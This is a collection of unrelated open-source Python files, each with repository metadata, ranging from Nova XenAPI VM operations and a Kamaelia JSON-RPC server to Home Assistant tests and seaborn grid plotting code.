default='nova.virt.xenapi.vif.XenAPIBridgeDriver',
help='The XenAPI VIF driver using XenServer Network APIs.'),
cfg.StrOpt('xenapi_image_upload_handler',
default='nova.virt.xenapi.imageupload.glance.GlanceStore',
help='Object Store Driver used to handle image uploads.'),
cfg.BoolOpt('xenapi_generate_swap',
default=False,
help='Whether to generate swap '
'(False means fetching it from OVA)'),
cfg.StrOpt('image_activation_file',
default=None,
help=_('JSON file containing image activation configuration')),
cfg.StrOpt('provider',
default='Rackspace',
help=_('Set the provider name. Defaults to "Rackspace".')),
    cfg.StrOpt('region',
default=None,
               help=_('Region compute host is in')),
cfg.StrOpt('ip_whitelist_file',
default=None,
help=_('File containing a list of IP addresses to whitelist '
'on managed hosts')),
cfg.StrOpt('max_snapshot_size',
default=0,
help=_('Maximum allowed number of bytes (before compression)'
' that may be uploaded during an instance snapshot.'
' A value of zero means there is no limit.')),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_vmops_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
firewall.__name__,
firewall.IptablesFirewallDriver.__name__)
RESIZE_TOTAL_STEPS = 5
DEVICE_ROOT = '0'
DEVICE_RESCUE = '1'
DEVICE_SWAP = '2'
DEVICE_CONFIGDRIVE = '3'
# Note(johngarbutt) HVM guests only support four devices
# until the PV tools activate, when others become available
# As such, ephemeral disk only available once PV tools load
DEVICE_EPHEMERAL = '4'
# Note(johngarbutt) Currently don't support ISO boot during rescue
# and we must have the ISO visible before the PV drivers start
DEVICE_CD = '1'
class RaxImageActivationConfig(object):
"""Manage RAX image license activation config state."""
def __init__(self):
self._cache = {}
if CONF.image_activation_file:
self._file_path = CONF.find_file(CONF.image_activation_file)
self.reload()
def reload(self):
"""(Re)load config from JSON file
        The file is a dict mapping each activation profile id to
a configuration value.
E.x. file:
{
"1-2-3-4-5": "useful_config_value"
}
"""
def _reload(data):
self._config = jsonutils.loads(data)
utils.read_cached_file(self._file_path, self._cache,
reload_func=_reload)
def get(self, profile_name):
"""Get config values for the given profile name."""
if not CONF.image_activation_file:
return None
self.reload()
return self._config.get(profile_name)
def cmp_version(a, b):
"""Compare two version strings (eg 0.0.1.10 > 0.0.1.9)."""
a = a.split('.')
b = b.split('.')
# Compare each individual portion of both version strings
for va, vb in zip(a, b):
ret = int(va) - int(vb)
if ret:
return ret
# Fallback to comparing length last
return len(a) - len(b)
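# Illustrative behaviour (examples added for clarity, not from the original):
#   cmp_version('0.0.1.10', '0.0.1.9') > 0   # 10 > 9 decides in the last field
#   cmp_version('1.2', '1.2.1') < 0          # equal prefix falls back to length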
def make_step_decorator(context, instance, instance_update):
"""Factory to create a decorator that records instance progress as a series
of discrete steps.
Each time the decorator is invoked we bump the total-step-count, so after::
@step
def step1():
...
@step
def step2():
...
we have a total-step-count of 2.
Each time the step-function (not the step-decorator!) is invoked, we bump
the current-step-count by 1, so after::
step1()
the current-step-count would be 1 giving a progress of ``1 / 2 *
100`` or 50%.
"""
step_info = dict(total=0, current=0)
def bump_progress():
step_info['current'] += 1
progress = round(float(step_info['current']) /
step_info['total'] * 100)
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
instance_update(context, instance['uuid'], {'progress': progress})
def step_decorator(f):
step_info['total'] += 1
@functools.wraps(f)
def inner(*args, **kwargs):
rv = f(*args, **kwargs)
bump_progress()
return rv
return inner
return step_decorator
class VMOps(object):
"""
Management class for VM-related tasks
"""
def __init__(self, session, virtapi):
self.compute_api = compute.API()
self._session = session
self._virtapi = virtapi
self._volumeops = volumeops.VolumeOps(self._session)
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self._virtapi,
xenapi_session=self._session)
vif_impl = importutils.import_class(CONF.xenapi_vif_driver)
self.vif_driver = vif_impl(xenapi_session=self._session)
self.default_root_dev = '/dev/sda'
# configs for image license activation:
self._rax_image_activation_config = RaxImageActivationConfig()
msg = _("Importing image upload handler: %s")
LOG.debug(msg % CONF.xenapi_image_upload_handler)
self.image_upload_handler = importutils.import_object(
CONF.xenapi_image_upload_handler)
@property
def agent_enabled(self):
return not CONF.xenapi_disable_agent
def _get_agent(self, instance, vm_ref):
if self.agent_enabled:
return xapi_agent.XenAPIBasedAgent(self._session, self._virtapi,
instance, vm_ref)
raise exception.NovaException(_("Error: Agent is disabled"))
def list_instances(self):
|
richbs/django-record-collector
|
recollect/urls.py
|
Python
|
bsd-3-clause
| 275
| 0.007273
|
from django.conf.urls import patterns, url
urlpatterns = patterns(
    '',
url(r'^$', 'recollect.views.home', name='home'),
url(r'^albums$', 'recollect.views.albums', name='albums'),
url(r'^album/(?P<album_slug>[A-z0-9-]+)$', 'recollect.views.album', name='album'),
)
|
Geheimorganisation/sltv
|
sltv/ui/input/autoaudioinput.py
|
Python
|
gpl-2.0
| 1,172
| 0.000854
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010 Holoscópio Tecnologia
# Author: Luciana Fujii Pontello <luciana@holoscopio.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import gobject
import gtk
from sltv.settings import UI_DIR
from core import InputUI
class AutoAudioInputUI(InputUI):
def __init__(self):
InputUI.__init__(self)
def get_widget(self):
return None
def get_name(self):
return "AutoAudio"
def get_description(self):
return "Auto Audio Source"
|
ericmjl/protein-interaction-network
|
proteingraph/features.py
|
Python
|
mit
| 501
| 0
|
"""
Author: Eric J. Ma
License: MIT
A Python module that provides helper functions and variables for encoding amino
acid features in the protein interaction network. We encode features in order
to feed the data into the neural fingerprinting software later on.
"""
amino_acids = [
"A",
"B",
"C",
"D",
"E",
"F",
"G",
"H",
"I",
"J",
"K",
"L",
"M
|
",
"N",
"P",
"Q",
"R",
"S",
"T",
"V",
"W",
"X",
"Y",
"Z",
]
|
DanNixon/Sakuya
|
pc_client/sakuyaclient/NotificationSource.py
|
Python
|
apache-2.0
| 562
| 0.001779
|
from abc import ABCMeta, abstractmethod
class NotificationSource():
"""
Abstract class for all notification sources.
"""
__metaclass__ = ABCMeta
@abstractmethod
def poll(self):
"""
Used to get a set of changes between data retrieved in this call and the last.
"""
        raise NotImplementedError('No concrete implementation!')
@abstractmethod
def name(self):
"""
Returns a unique name for the source type.
"""
raise NotImplementedError('No concrete implementation!')
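# Illustrative sketch of a concrete source (hypothetical class, added for
# clarity; any real implementation would live in its own module):
#   class DummySource(NotificationSource):
#       def poll(self):
#           return []        # no changes since the previous poll
#       def name(self):
#           return 'dummy'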
|
matthew-brett/draft-statsmodels
|
scikits/statsmodels/sandbox/examples/ex_onewaygls.py
|
Python
|
bsd-3-clause
| 4,198
| 0.010005
|
# -*- coding: utf-8 -*-
"""Example: Test for equality of coefficients across groups/regressions
Created on Sat Mar 27 22:36:51 2010
Author: josef-pktd
"""
import numpy as np
from scipy import stats
#from numpy.testing import assert_almost_equal
import scikits.statsmodels as sm
from scikits.statsmodels.sandbox.regression.onewaygls import OneWayLS
#choose example
#--------------
example = ['null', 'diff'][1] #null: identical coefficients across groups
example_size = [10, 100][0]
example_size = [(10,2), (100,2)][0]
example_groups = ['2', '2-2'][1]
#'2-2': 4 groups,
# groups 0 and 1 and groups 2 and 3 have identical parameters in DGP
#generate example
#----------------
np.random.seed(87654589)
nobs, nvars = example_size
x1 = np.random.normal(size=(nobs, nvars))
y1 = 10 + np.dot(x1,[15.]*nvars) + 2*np.random.normal(size=nobs)
x1 = sm.add_constant(x1) #, prepend=True)
#assert_almost_equal(x1, np.vander(x1[:,0],2), 16)
#res1 = sm.OLS(y1, x1).fit()
#print res1.params
#print np.polyfit(x1[:,0], y1, 1)
#assert_almost_equal(res1.params, np.polyfit(x1[:,0], y1, 1), 14)
#print res1.summary(xname=['x1','const1'])
#regression 2
x2 = np.random.normal(size=(nobs,nvars))
if example == 'null':
y2 = 10 + np.dot(x2,[15.]*nvars) + 2*np.random.normal(size=nobs) # if H0 is true
else:
y2 = 19 + np.dot(x2,[17.]*nvars) + 2*np.random.normal(size=nobs)
x2 = sm.add_constant(x2)
# stack
x = np.concatenate((x1,x2),0)
y = np.concatenate((y1,y2))
if example_groups == '2':
groupind = (np.arange(2*nobs)>nobs-1).astype(int)
else:
groupind = np.mod(np.arange(2*nobs),4)
groupind.sort()
#x = np.column_stack((x,x*groupind[:,None]))
def print_results(res):
groupind = res.groups
#res.fitjoint() #not really necessary, because called by ftest_summary
ft = res.ftest_summary()
#print ft[0] #skip because table is nicer
print '\nTable of F-tests for overall or pairwise equality of coefficients'
print 'hypothesis F-statistic p-value df_denom df_num reject'
for row in ft[1]:
print row,
if row[1][1]<0.05:
print '*'
else:
print ''
print 'Notes: p-values are not corrected for many tests'
    print '    (no Bonferroni correction)'
print ' * : reject at 5% uncorrected confidence level'
print 'Null hypothesis: all or pairwise coefficient are the same'
print 'Alternative hypothesis: all coefficients are different'
print '\nComparison with stats.f_oneway'
print stats.f_oneway(*[y[groupind==gr] for gr in res.unique])
print '\nLikelihood Ratio Test'
print 'likelihood ratio p-value df'
print res.lr_test()
print 'Null model: pooled all coefficients are the same across groups,'
print 'Alternative model: all coefficients are allowed to be different'
print 'not verified but looks close to f-test result'
print '\nOls parameters by group from individual, separate ols regressions'
for group in sorted(res.olsbygroup):
r = res.olsbygroup[group]
print group, r.params
print '\nCheck for heteroscedasticity, '
print 'variance and standard deviation for individual regressions'
print ' '*12, ' '.join('group %-10s' %(gr) for gr in res.unique)
print 'variance ', res.sigmabygroup
print 'standard dev', np.sqrt(res.sigmabygroup)
#get results for example
#-----------------------
print '\nTest for equality of coefficients for all exogenous variables'
print '-------------------------------------------------------------'
res = OneWayLS(y,x, groups=groupind.astype(int))
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor'
print '---------------------------------------------'
print 'this is the same as scipy.stats.f_oneway'
res = OneWayLS(y,np.ones(len(y)), groups=groupind)
print_results(res)
print '\n\nOne way ANOVA, constant is the only regressor with het is true'
print '--------------------------------------------------------------'
print 'this is the similar to scipy.stats.f_oneway,'
print 'but variance is not assumed to be the same across groups'
res = OneWayLS(y,np.ones(len(y)), groups=groupind, het=True)
print_results(res)
|
anandpdoshi/erpnext
|
erpnext/setup/install.py
|
Python
|
agpl-3.0
| 1,780
| 0.024719
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
default_mail_footer = """<div style="padding: 7px; text-align: right; color: #888"><small>Sent via
	<a style="color: #888" href="http://erpnext.org">ERPNext</a></div>"""
def after_install():
frappe.get_doc({'doctype': "Role", "role_name": "Analytics"}).insert()
set_single_defaults()
create_compact_item_print_custom_field()
from frappe.desk.page.setup_wizard.setup_wizard import add_all_roles_to
add_all_roles_to("Administrator")
frappe.db.commit()
def check_setup_wizard_not_completed():
if frappe.db.get_default('desktop:home_page') == 'desktop':
print
print "ERPNext can only be installed on a fresh site where the setup wizard is not completed"
print "You can reinstall this site (after saving your data) using: bench --site [sitename] reinstall"
print
return False
def set_single_defaults():
for dt in frappe.db.sql_list("""select name from `tabDocType` where issingle=1"""):
default_values = frappe.db.sql("""select fieldname, `default` from `tabDocField`
where parent=%s""", dt)
if default_values:
try:
b = frappe.get_doc(dt, dt)
for fieldname, value in default_values:
b.set(fieldname, value)
b.save()
except frappe.MandatoryError:
pass
frappe.db.set_default("date_format", "dd-mm-yyyy")
def create_compact_item_print_custom_field():
from frappe.custom.doctype.custom_field.custom_field import create_custom_field
create_custom_field('Print Settings', {
'label': _('Compact Item Print'),
'fieldname': 'compact_item_print',
'fieldtype': 'Check',
'default': 1,
'insert_after': 'with_letterhead'
})
|
sparkslabs/kamaelia_
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/JsonRPC/BDJsonRPC.py
|
Python
|
apache-2.0
| 35,300
| 0.013059
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
'''
Bi-directional JsonRPC Server and Client for Kamaelia.
Copyright (c) 2009 Rasjid Wilcox and CDG Computer Services.
Licensed to the BBC under a Contributor Agreement
'''
import Axon
from Axon.Handle import Handle
from Axon.background import background
from Axon.Ipc import shutdownMicroprocess, producerFinished
from Kamaelia.Chassis.ConnectedServer import ServerCore
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Chassis.Graphline import Graphline
from Kamaelia.Internet.TCPClient import TCPClient
from jsonrpc import JsonRpc20, RPCFault, METHOD_NOT_FOUND, INTERNAL_ERROR, ERROR_MESSAGE, REQUEST, RESPONSE, ERROR, json_split
from traceback import format_exc
from collections import defaultdict
import types, inspect, Queue
# FIXME: add protection from Denial of Service
# decorators to mark funcation args as either
# callback requests or callback notifications
def cb_request(arg_name, response_func, convert_args = False):
def cb_request_dec(func):
if not hasattr(func, '_callbacks_'):
func._callbacks_ = {}
if response_func:
func._callbacks_[arg_name] = ResponseCallback(response_func, convert_args)
else:
func._callbacks_[arg_name] = None
return func
return cb_request_dec
def cb_notification(arg_name):
return cb_request(arg_name, None)
class ResponseCallback(object):
def __init__(self, callback_func, convert_args = False):
'''if convert_args then convert a list, tuple or dict to args in standard jsonrpc way'''
self.callback_func = callback_func
self.convert_args = convert_args
class RequestOrNotification(object):
'If response_callback is None, then this is a notification'
def __init__(self, method, params = None, response_callback = None):
if response_callback: assert isinstance(response_callback, ResponseCallback)
self.method = method
self.params = params
self.response_callback = response_callback
class JsonRpcProtocol(object):
'Protocol Factory for JsonRpc over TCP'
def __init__(self, task_runner, id_prefix = 'server', debug = 0):
self.task_runner = task_runner
self.id_prefix = id_prefix
self.debug = debug
self.dispatch_table = {}
self.callback_table = defaultdict(dict) # try key on actual function
self.requests_on_connect = []
self.requests_on_connect_wait = None # id of request to wait for before sending next
self.requests_sent = {}
self._request_id_num = 1
self.connections = []
def get_request_id(self, request):
req_num = self._request_id_num
if self.id_prefix:
request_id = '%s-%s' % (self.id_prefix, req_num)
else:
request_id = req_num
assert isinstance(request, RequestOrNotification)
self.requests_sent[request_id] = request.response_callback
if request.response_callback:
self.add_callbacks(request.response_callback)
self._request_id_num += 1
return request_id
def add_callbacks(self, function):
if function in self.callback_table:
            # already in callback table, so just return
return
if hasattr(function, '_callbacks_'): # 'response_callback'):
for arg_name, response_callback in function._callbacks_.items():
name = function.__name__
self.callback_table[function][arg_name] = response_callback
print 'Added callback for method %s, argument %s' % (name, arg_name)
try:
# args by position - offset needed for instance methods etc
offset = 1 if (hasattr(function, 'im_self') and function.im_self) else 0
arg_num = inspect.getargspec(function)[0].index(arg_name) - offset
self.callback_table[function][arg_num] = response_callback
print 'Added callback for method %s, arg_num %s' % (name, arg_num)
except ValueError:
print 'WARNING: unable to determine argument position for callback on method %s, argument %s.\n' \
'Automatic callback conversion will not occur if called by position.' % (name, arg_name)
def add_function(self, function, name = None):
if name is None:
name = function.__name__
if name in self.dispatch_table:
raise ValueError('rpc method %s already exists!' % name)
self.dispatch_table[name] = function
print 'Added rpc method %s' % name
self.add_callbacks(function)
def add_instance(self, instance, prefix = None):
'''Add all callable attributes of an instance not starting with '_'.
If prefix is none, then the rpc name is just <method_name>,
otherwise it is '<prefix>.<method_name>
'''
for name in dir(instance):
if name[0] != '_':
func = getattr(instance, name, None)
if type(func) == types.MethodType:
if prefix:
rpcname = '%s.%s' % (prefix, func.__name__)
else:
rpcname = func.__name__
self.add_function(func, name = rpcname)
def add_request_on_connect(self, req_or_notification, wait = True):
self.requests_on_connect.append( (req_or_notification, wait) )
def __call__(self, **kwargs):
if self.debug >= 1:
print 'Creating new Protocol Factory: ', str(kwargs)
connection = Graphline( SPLITTER = JsonSplitter(debug = self.debug, factory = self, **kwargs),
DESERIALIZER = Deserializer(debug = self.debug, factory = self, **kwargs),
DISPATCHER = Dispatcher(debug = self.debug, factory = self, **kwargs),
RESPONSESERIALIZER = ResponseSerializer(debug = self.debug, factory = self, **kwargs),
REQUESTSERIALIZER = RequestSerializer(debug = self.debug, factory = self, **kwargs),
FINALIZER = Finalizer(debug = self.debug, factory = self, **kwargs),
TASKRUNNER = self.task_runner,
linkages = { ('self', 'inbox') : ('SPLITTER', 'inbox'),
('self', 'request') : ('REQUESTSERIALIZER', 'request'),
('SPLITTER', 'outbox') : ('DESERIALIZER', 'inbox'),
('DESERIALIZER', 'outbox'): ('DISPATCHER', 'inbox'),
('DESERIALIZER', 'error'): ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'outbox') : ('TASKRUNNER', 'inbox'),
('DISPATCHER', 'result_out') : ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'request_out') : ('REQUESTSERIALIZER', 'request'),
('RESPONSESERIALIZER', 'outbox') : ('self', 'outbox'),
('REQUESTSERIALIZER', 'outbox'): ('self', 'outbox'),
|
xiaoyongaa/ALL
|
python基础2周/17猜年龄游戏.py
|
Python
|
apache-2.0
| 1,545
| 0.027353
|
'''
Notes
for i in range(10):
    # every 3 chances, ask once
'''
age=22
c=0
while True:
if c<3:
cai=input("请输入要猜的年龄:")
        if cai.isdigit(): # check whether the input is an integer
print("格式正确")
            cai1=int(cai) # input is numeric, convert it to int
if cai1==age and c<3:
                print("猜对了")
break
elif cai1>age and c<3:
print("猜大了")
c+=1
elif cai1<age and c<3:
print("猜小了")
c+=1
        else: # input was not an integer
print("输入格式不正确")
else:
p=input("次数用完,是否要继续,继续请按:yes,不想继续请按no:")
if p=="yes":
c=0
            cai=input("请输入要猜的年龄:")
            if cai.isdigit(): # check whether the input is an integer
print("格式正确2")
                cai1=int(cai) # input is numeric, convert it to int
if cai1==age and c<3:
print("猜对了")
break
elif cai1>age and c<3:
print("猜大了")
c+=1
elif cai1<age and c<3:
print("猜小了")
c+=1
            else: # input was not an integer
print("输入格式不正确")
elif p=="no":
print("你选择了退出 bye bye")
break
|
cbcoutinho/learn_dg
|
tests/helpers.py
|
Python
|
bsd-2-clause
| 4,156
| 0.001444
|
import numpy as np
from ctypes import (
CDLL,
POINTER,
ARRAY,
c_void_p,
c_int,
byref,
c_double,
c_char,
c_char_p,
create_string_buffer,
)
from numpy.ctypeslib import ndpointer
import sys, os
prefix = {"win32": "lib"}.get(sys.platform, "lib")
extension = {"darwin": ".dylib", "win32": ".dll"}.get(sys.platform, ".so")
dir_lib = {"win32": "bin"}.get(sys.platform, "lib")
libcore = CDLL(os.path.join("build", dir_lib, prefix + "core" + extension))
def set_assembleElementalMatrix2D_c_args(N):
"""
Assign function and set the input arguement types for a 2D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N, 2), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_create_simple_array_c_args(N):
"""
    Assign function and set argument types of a simple array
"""
f = libcore.create_simple_array_c
f.argtypes = [ndpointer(shape=(N, N), dtype="double", flags="F")]
f.restype = None
return f
def set_assembleElementalMatrix1D_args(N):
"""
    Assign function and set the input argument types for a 1D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N,), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble1D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
    Assign function and set the input argument types for assembling a full 1D
matrix
(int, int, int, c_double(N), c_double(N1,N2), c_double, c_double, c_double(N,N))
"""
f = libcore.assemble1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts,), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
c_double,
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble2D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
    Assign function and set the input argument types for assembling a full 2D
matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assemble2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts, 2), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
ndpointer(shape=(2,), dtype="double", flags="F"),
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_single_row_args(N):
"""
    Assign the argument types for Pascal row arrays
"""
f = libcore.pascal_single_row_c
f.argtypes = [
c_int,
c_double,
c_double,
ndpointer(shape=(N + 1,), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_2D_quad_c_args(N):
"""
    Assign argument types for full (quadrilateral) Pascal lines
"""
f = libcore.pascal_2D_quad_c
f.argtypes = [
c_int,
c_double,
c_double,
ndpointer(shape=((N + 1) ** 2,), dtype="double", flags="F"),
]
f.restype = None
return f
def pascal_2D_single_row(N, x, y):
xs = np.array([np.power(x, N - ii) for ii in range(N + 1)])
ys = np.array([np.power(y, ii) for ii in range(N + 1)])
return xs * ys
def pascal_2D_post_row(N, ii, x, y):
temp = pascal_2D_single_row(ii, x, y)
return temp[ii - N : N + 1]
def pascal_2D_total_row(N, x, y):
temp_pre = [pascal_2D_single_row(ii, x, y) for ii in range(N + 1)]
temp_post = [pascal_2D_post_row(N, ii, x, y) for ii in range(N + 1, 2 * N + 1)]
row = temp_pre + temp_post
return np.concatenate(row)
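# Illustrative usage sketch (added for clarity; it assumes the compiled libcore
# library from the build tree is available, so it is not executed here):
#   N = 4
#   fill = set_create_simple_array_c_args(N)
#   A = np.zeros((N, N), dtype="double", order="F")  # Fortran-ordered buffer
#   fill(A)                                          # the routine writes into A in place
# The ndpointer shapes and flags declared above must match what libcore
# expects, otherwise ctypes rejects the argument at call time.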
|
mhbu50/erpnext
|
erpnext/crm/doctype/campaign/test_campaign.py
|
Python
|
gpl-3.0
| 167
| 0.005988
|
# Copyright (c) 2021, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
# import frappe
import unittest
class TestCampaign(unittest.TestCase):
pass
|
w1ll1am23/home-assistant
|
tests/components/homekit_controller/specific_devices/test_koogeek_ls1.py
|
Python
|
apache-2.0
| 3,555
| 0.000281
|
"""Make sure that existing Koogeek LS1 support isn't broken."""
from datetime import timedelta
from unittest import mock
from aiohomekit.exceptions import AccessoryDisconnectedError, EncryptionError
from aiohomekit.testing import FakePairing
import pytest
from homeassistant.components.light import SUPPORT_BRIGHTNESS, SUPPORT_COLOR
from homeassistant.helpers import device_registry as dr, entity_registry as er
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
from tests.components.homekit_controller.common import (
Helper,
setup_accessories_from_file,
setup_test_accessories,
)
LIGHT_ON = ("lightbulb", "on")
async def test_koogeek_ls1_setup(hass):
"""Test that a Koogeek LS1 can be correctly setup in HA."""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
entity_registry = er.async_get(hass)
# Assert that the entity is correctly added to the entity registry
entry = entity_registry.async_get("light.koogeek_ls1_20833f")
assert entry.unique_id == "homekit-AAAA011111111111-7"
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
state = await helper.poll_and_get_state()
# Assert that the friendly name is detected correctly
assert state.attributes["friendly_name"] == "Koogeek-LS1-20833F"
# Assert that all optional features the LS1 supports are detected
assert state.attributes["supported_features"] == (
SUPPORT_BRIGHTNESS | SUPPORT_COLOR
)
device_registry = dr.async_get(hass)
device = device_registry.async_get(entry.device_id)
assert device.manufacturer == "Koogeek"
assert device.name == "Koogeek-LS1-20833F"
assert device.model == "LS1"
assert device.sw_version == "2.2.15"
assert device.via_device_id is None
@pytest.mark.parametrize("failure_cls", [AccessoryDisconnectedError, EncryptionError])
async def test_recover_from_failure(hass, utcnow, failure_cls):
"""
    Test that entity actually recovers from a network connection drop.
See https://github.com/home-assistant/core/issues/18949
"""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
# Set light state on fake device to off
    helper.characteristics[LIGHT_ON].set_value(False)
# Test that entity starts off in a known state
state = await helper.poll_and_get_state()
assert state.state == "off"
# Set light state on fake device to on
helper.characteristics[LIGHT_ON].set_value(True)
# Test that entity remains in the same state if there is a network error
next_update = dt_util.utcnow() + timedelta(seconds=60)
with mock.patch.object(FakePairing, "get_characteristics") as get_char:
get_char.side_effect = failure_cls("Disconnected")
state = await helper.poll_and_get_state()
assert state.state == "off"
chars = get_char.call_args[0][0]
assert set(chars) == {(1, 8), (1, 9), (1, 10), (1, 11)}
# Test that entity changes state when network error goes away
next_update += timedelta(seconds=60)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = await helper.poll_and_get_state()
assert state.state == "on"
|
mwaskom/seaborn
|
seaborn/axisgrid.py
|
Python
|
bsd-3-clause
| 87,264
| 0.000562
|
from itertools import product
from inspect import signature
import warnings
from textwrap import dedent
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from ._core import VectorPlotter, variable_type, categorical_order
from . import utils
from .utils import _check_argument, adjust_legend_subtitles, _draw_figure
from .palettes import color_palette, blend_palette
from ._decorators import _deprecate_positional_args
from ._docstrings import (
DocstringComponents,
_core_docs,
)
__all__ = ["FacetGrid", "PairGrid", "JointGrid", "pairplot", "jointplot"]
_param_docs = DocstringComponents.from_nested_components(
core=_core_docs["params"],
)
class _BaseGrid:
"""Base class for grids of subplots."""
def set(self, **kwargs):
"""Set attributes on each subplot Axes."""
for ax in self.axes.flat:
if ax is not None: # Handle removed axes
ax.set(**kwargs)
return self
@property
def fig(self):
"""DEPRECATED: prefer the `figure` property."""
# Grid.figure is preferred because it matches the Axes attribute name.
        # But as the maintenance burden of having this property is minimal,
# let's be slow about formally deprecating it. For now just note its deprecation
# in the docstring; add a warning in version 0.13, and eventually remove it.
return self._figure
@property
def figure(self):
"""Access the :class:`matplotlib.figure.Figure` object underlying the grid."""
return self._figure
def savefig(self, *args, **kwargs):
"""
Save an image of the plot.
This wraps :meth:`matplotlib.figure.Figure.savefig`, using bbox_inches="tight"
by default. Parameters are passed through to the matplotlib function.
"""
kwargs = kwargs.copy()
kwargs.setdefault("bbox_inches", "tight")
self.figure.savefig(*args, **kwargs)
class Grid(_BaseGrid):
"""A grid that can have multiple subplots and an external legend."""
_margin_titles = False
_legend_out = True
def __init__(self):
self._tight_layout_rect = [0, 0, 1, 1]
self._tight_layout_pad = None
# This attribute is set externally and is a hack to handle newer functions that
# don't add proxy artists onto the Axes. We need an overall cleaner approach.
self._extract_legend_handles = False
def tight_layout(self, *args, **kwargs):
"""Call fig.tight_layout within rect that exclude the legend."""
kwargs = kwargs.copy()
kwargs.setdefault("rect", self._tight_layout_rect)
if self._tight_layout_pad is not None:
kwargs.setdefault("pad", self._tight_layout_pad)
self._figure.tight_layout(*args, **kwargs)
def add_legend(self, legend_data=None, title=None, label_order=None,
adjust_subtitles=False, **kwargs):
"""Draw a legend, maybe placing it outside axes and resizing the figure.
Parameters
----------
legend_data : dict
Dictionary mapping label names (or two-element tuples where the
second element is a label name) to matplotlib artist handles. The
default reads from ``self._legend_data``.
title : string
Title for the legend. The default reads from ``self._hue_var``.
label_order : list of labels
The order that the legend entries should appear in. The default
reads from ``self.hue_names``.
adjust_subtitles : bool
If True, modify entries with invisible artists to left-align
the labels and set the font size to that of a title.
kwargs : key, value pairings
Other keyword arguments are passed to the underlying legend methods
on the Figure or Axes object.
Returns
-------
self : Grid instance
Returns self for easy chaining.
"""
# Find the data for the legend
if legend_data is None:
legend_data = self._legend_data
if label_order is None:
if self.hue_names is None:
label_order = list(legend_data.keys())
else:
label_order = list(map(utils.to_utf8, self.hue_names))
blank_handle = mpl.patches.Patch(alpha=0, linewidth=0)
handles = [legend_data.get(l, blank_handle) for l in label_order]
title = self._hue_var if title is None else title
title_size = mpl.rcParams["legend.title_fontsize"]
# Unpack nested labels from a hierarchical legend
labels = []
for entry in label_order:
if isinstance(entry, tuple):
_, label = entry
else:
label = entry
labels.append(label)
# Set default legend kwargs
kwargs.setdefault("scatterpoints", 1)
if self._legend_out:
kwargs.setdefault("frameon", False)
kwargs.setdefault("loc", "center right")
# Draw a full-figure legend outside the grid
figlegend = self._figure.legend(handles, labels, **kwargs)
self._legend = figlegend
figlegend.set_title(title, prop={"size": title_size})
if adjust_subtitles:
adjust_legend_subtitles(figlegend)
# Draw the plot to set the bounding boxes correctly
_draw_figure(self._figure)
